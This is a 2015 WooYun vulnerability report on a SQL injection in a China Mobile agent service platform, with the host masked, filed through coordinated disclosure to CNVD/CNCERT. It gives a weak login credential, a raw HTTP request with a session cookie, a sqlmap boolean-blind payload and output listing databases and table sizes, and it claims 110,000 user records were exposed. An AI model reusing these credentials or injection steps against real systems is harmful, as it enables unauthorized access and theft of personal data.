当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150410

漏洞标题:中国移动某重要平台SQL注入导致大量用户详细信息泄漏(姓名/邮箱/地址/手机号/QQ号等)

相关厂商:中国移动

漏洞作者: Looke

提交时间:2015-10-29 18:45

修复时间:2015-12-17 15:28

公开时间:2015-12-17 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-11-02: 厂商已经确认,细节仅向厂商公开
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

RT

详细说明:

系统:中国移动代理服务器统一服务平台

http://**.**.**.**/


弱口令:liuxin 密码:123456
登陆后发现如下链接存在注入:

http://**.**.**.**/newsview.asp?News_ID=9


漏洞地址:

GET /newsview.asp?News_ID=9 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCQRRAQCC=GCGNBCGAGGPBPKAEFKGHPBHI; User%5FType=%D3%C3%BB%A7; User%5FID=1692; User%5FAccount=liuxin; NewsFlag=29


ID参数存在注入

---
Parameter: News_ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: News_ID=9 AND 3394=3394
---
[17:12:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008

漏洞证明:

数据库:

available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] zps


二千多万数据信息泄漏

Database: zps
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| dbo.MT20150512              | 1300631 |
| dbo.MT20150724              | 1216847 |
| dbo.MT20150521              | 1112351 |
| dbo.MT20150529              | 1104653 |
| dbo.MT20150520              | 1087323 |
| dbo.MT20150619              | 1078151 |
| dbo.MT20150814              | 1077438 |
| dbo.MT20150730              | 1065513 |
| dbo.MT20150930              | 1014321 |
| dbo.MT20150618              | 1002796 |
| dbo.MT20150605              | 943391  |
| dbo.MT20150925              | 941665  |
| dbo.MT20150820              | 917963  |
| dbo.MT20150522              | 875826  |
| dbo.Stat                    | 860200  |
| dbo.MT20150604              | 845547  |
| dbo.MT20150716              | 821092  |
| dbo.MT20150626              | 797548  |
| dbo.MT20150513              | 785944  |
| dbo.MT20150911              | 774978  |
| dbo.MT20150612              | 768985  |
| dbo.MT20150806              | 759100  |
| dbo.MT20150525              | 757955  |
| dbo.MT20150515              | 748140  |
| dbo.MT20150703              | 717539  |
| dbo.MT20150710              | 711096  |
| dbo.MT20150819              | 703292  |
| dbo.MT20150821              | 699784  |
| dbo.MT20150717              | 666628  |
| dbo.MT20150528              | 649976  |
| dbo.MT20150501              | 630256  |
| dbo.MT20150507              | 606188  |
| dbo.MT20150910              | 601285  |
| dbo.MT20150530              | 598854  |
| dbo.MT20150508              | 587658  |
| dbo.MT20150723              | 583387  |
| dbo.MT20150601              | 572061  |
| dbo.MT20150625              | 570554  |
| dbo.MT20150514              | 555043  |
| dbo.MT20150929              | 542677  |
| dbo.MT20150705              | 526571  |
| dbo.MT20150731              | 519889  |
| dbo.MT20150623              | 510131  |
| dbo.MT20150807              | 498585  |
| dbo.MT20150725              | 494786  |
| dbo.MT20150519              | 490501  |
| dbo.MT20150709              | 476383  |
| dbo.MT20150516              | 471334  |
| dbo.MT20150523              | 467576  |
| dbo.MT20150620              | 466131  |
| dbo.MT20150606              | 456222  |
| dbo.MT20150611              | 451591  |
| dbo.MT20150616              | 448405  |
| dbo.MT20150918              | 446117  |
| dbo.MT20151029              | 446050  |
| dbo.MT20150617              | 445359  |
| dbo.MT20150603              | 441944  |
| dbo.MT20150926              | 438594  |
| dbo.MT20150702              | 419481  |
| dbo.MT20150526              | 414403  |
| dbo.MT20150722              | 414216  |
| dbo.MT20150527              | 409097  |
| dbo.MT20151023              | 403022  |
| dbo.MT20150917              | 391099  |
| dbo.MT20150907              | 383748  |
| dbo.MT20150701              | 372585  |
| dbo.MT20150828              | 370820  |
| dbo.MT20150924              | 369880  |
| dbo.MT20150610              | 367191  |
| dbo.MT20150615              | 364051  |
| dbo.MT20150509              | 363048  |
| dbo.MT20150704              | 362277  |
| dbo.MT20150609              | 360586  |
| dbo.MT20150906              | 358841  |
| dbo.MT20150624              | 355980  |
| dbo.MT20151016              | 353044  |
| dbo.MT20150801              | 347919  |
| dbo.MT20150812              | 343406  |
| dbo.MT20151001              | 336112  |
| dbo.MT20150822              | 326996  |
| dbo.MT20150818              | 323604  |
| dbo.MT20150602              | 318139  |
| dbo.MT20150916              | 313292  |
| dbo.MT20150630              | 311439  |
| dbo.MT20150908              | 310660  |
| dbo.MT20150608              | 309429  |
| dbo.MT20150714              | 307381  |
| dbo.MT20150627              | 306443  |
| dbo.MT20150914              | 305100  |
| dbo.MT20150919              | 304626  |
| dbo.MT20150629              | 303031  |
| dbo.MT20150817              | 301790  |
| dbo.MT20150728              | 301428  |
| dbo.MT20150811              | 299258  |
| dbo.MT20150923              | 298486  |
| dbo.MT20150711              | 296465  |
| dbo.Finance                 | 294621  |
| dbo.MT20150524              | 292272  |
| dbo.MT20150909              | 291320  |
| dbo.MT20150506              | 290831  |
| dbo.MT20150511              | 286425  |
| dbo.MT20150707              | 285185  |
| dbo.MT20150721              | 284167  |
| dbo.MT20150813              | 281533  |
| dbo.MT20150824              | 273909  |
| dbo.MT20150518              | 271676  |
| dbo.MT20150815              | 267474  |
| dbo.MT20150708              | 265154  |
| dbo.MT20150808              | 259589  |
| dbo.MT20150531              | 256310  |
| dbo.MT20150720              | 251164  |
| dbo.MT20151022              | 251160  |
| dbo.MT20150504              | 248356  |
| dbo.MT20150706              | 246225  |
| dbo.MT20150502              | 245435  |
| dbo.MT20150827              | 238763  |
| dbo.MT20151008              | 234516  |
| dbo.MT20150805              | 231733  |
| dbo.MT20150613              | 231690  |
| dbo.MT20151014              | 231209  |
| dbo.MT20151020              | 229877  |
| dbo.MT20150928              | 227405  |
| dbo.MT20150921              | 222047  |
| dbo.MT20150729              | 221324  |
| dbo.MT20150727              | 220879  |
| dbo.MT20150803              | 217732  |
| dbo.MT20151015              | 215287  |
| dbo.MT20150718              | 211080  |
| dbo.MT20150829              | 210303  |
| dbo.MT20150712              | 210123  |
| dbo.MT20150922              | 209444  |
| dbo.MT20150719              | 206663  |
| dbo.MT20150505              | 206100  |
| dbo.MT20150804              | 204653  |
| dbo.MT20150510              | 204634  |
| dbo.MT20151009              | 202417  |
| dbo.MT20150715              | 197408  |
| dbo.MT20150621              | 195673  |
| dbo.MT20150816              | 193286  |
| dbo.MT20150927              | 190966  |
| dbo.MT20150713              | 189635  |
| dbo.MT20150517              | 189051  |
| dbo.MT20150826              | 185623  |
| dbo.MT20150726              | 184240  |
| dbo.MT20151027              | 183812  |
| dbo.MT20150810              | 181070  |
| dbo.MT20151017              | 170336  |
| dbo.MT20151012              | 165449  |
| dbo.MT20150825              | 165161  |
| dbo.MT20151021              | 163153  |
| dbo.MT20151024              | 163039  |
| dbo.MT20151019              | 162500  |
| dbo.MT20150622              | 160195  |
| dbo.MT20151026              | 157108  |
| dbo.MT20150607              | 155359  |
| dbo.MT20150915              | 153941  |
| dbo.MT20150912              | 153011  |
| dbo.MT20150830              | 152814  |
| dbo.MT20150503              | 149904  |
| dbo.MT20150823              | 149206  |
| dbo.MT20150920              | 143914  |
| dbo.MT20150614              | 135904  |
| dbo.Send                    | 133039  |
| dbo.MT20150802              | 126744  |
| dbo.MT20151010              | 122862  |
| dbo.MT20151013              | 120010  |
| dbo.MT20151028              | 119794  |
| dbo.Customer                | 115709  |
| dbo.MT20151018              | 112197  |
| dbo.MT20151003              | 111246  |
| dbo.MT20150809              | 103169  |
| dbo.MT20150831              | 93620   |
| dbo.MT20150628              | 87142   |
| dbo.MT20150913              | 86647   |
| dbo.MT20151006              | 85695   |
| dbo.MT20151002              | 85216   |
| dbo.MT20151025              | 83901   |
| dbo.Log                     | 72479   |
| dbo.MT20151004              | 62265   |
| dbo.MT20151005              | 59134   |
| dbo.MT20151011              | 55722   |
| dbo.MT20151007              | 53971   |
| dbo.Recv                    | 42201   |
| dbo.MT20150904              | 42055   |
| dbo.MT20150902              | 17847   |
| dbo.MT20150905              | 15111   |
| dbo.MT20150903              | 9977    |
| dbo.UserChannel             | 7011    |
| dbo.MT20150901              | 4785    |
| dbo.BlackList1              | 2992    |
| dbo.Admin                   | 543     |
| dbo.Draft                   | 282     |
| dbo.DraftType               | 178     |
| dbo.Badwords                | 27      |
| dbo.ChannelSend             | 18      |
| dbo.CycleSend               | 16      |
| dbo.Channel                 | 1       |
| dbo.News                    | 1       |
| dbo.Setting                 | 1       |
+-----------------------------+---------+
Database: msdb
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| dbo.syspolicy_configuration | 4       |
+-----------------------------+---------+


11W用户详细信息:姓名、性别、地址、手机、传真、QQ、邮件

11W用户信息.png


未脱库,怕被查水表,点到为止

修复方案:

@@

版权声明:转载请注明来源 Looke@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-02 15:27

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无